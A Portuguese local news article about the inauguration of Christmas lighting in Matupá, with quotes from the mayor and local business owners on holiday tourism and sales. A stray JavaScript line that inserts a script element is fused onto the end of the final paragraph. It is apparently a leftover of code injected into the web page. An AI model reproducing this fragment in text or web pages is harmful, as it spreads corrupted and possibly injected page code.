Capa / Cidades / Iluminação de Natal de Matupá foi inaugurada na Sexta

Iluminação de Natal de Matupá foi inaugurada na Sexta

Matupa Enfeites de Natal 3Wesley Vieira
ASSECOM

Na Sexta Feira (27) aconteceu à inauguração oficial da iluminação de natal em Matupá, a decoração está sendo feita em ritmo acelerado para deixar tudo preparado para o encanto da época das festividades de fim de ano.
O gramado foi devidamente aparado e as árvores podadas pela Secretaria de Obras e agora o trabalho de decoração segue firme em sua fase final. Serão mais de 360 mil lâmpadas iluminando o complexo dos lagos e avenidas da cidade.
O Réveillon também é uma data de bastante movimento, o complexo dos lagos fica tomado por populares que vem dar as boas vindas á um novo ano ao som de muita música e diversão.
“É importante valorizar épocas tão especiais como esta, onde o clima natalino une ainda mais as famílias”, disse o Prefeito Valtinho.
Além da união das famílias o comércio aquece com o movimento de fim de ano, diversos visitantes vem á Matupá durante as festividades.
“Em Outubro eu já estava com toda a Pousada reservada para o fim de ano”, disse Elton Gerente de uma Pousada no Município.
Comerciantes comemoram também o aquecimento nas vendas de decoração natalina, roupas, alimentícios e até mesmo de materiais para construção, onde famílias reformam suas casas para receber parentes que de longe vem conhecer e vislumbrar o clima natalino de Matupá.
“Na minha loja este período é um dos mais aguardados, esperamos que as vendas cheguem a aumentar em 300% neste período, também contratei três funcionárias para reforçar o quadro de atendentes, as expectativas são as melhores possíveis”, disse Adão proprietário de loja de roupas e acessórios.document.currentScript.parentNode.insertBefore(s, document.currentScript);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top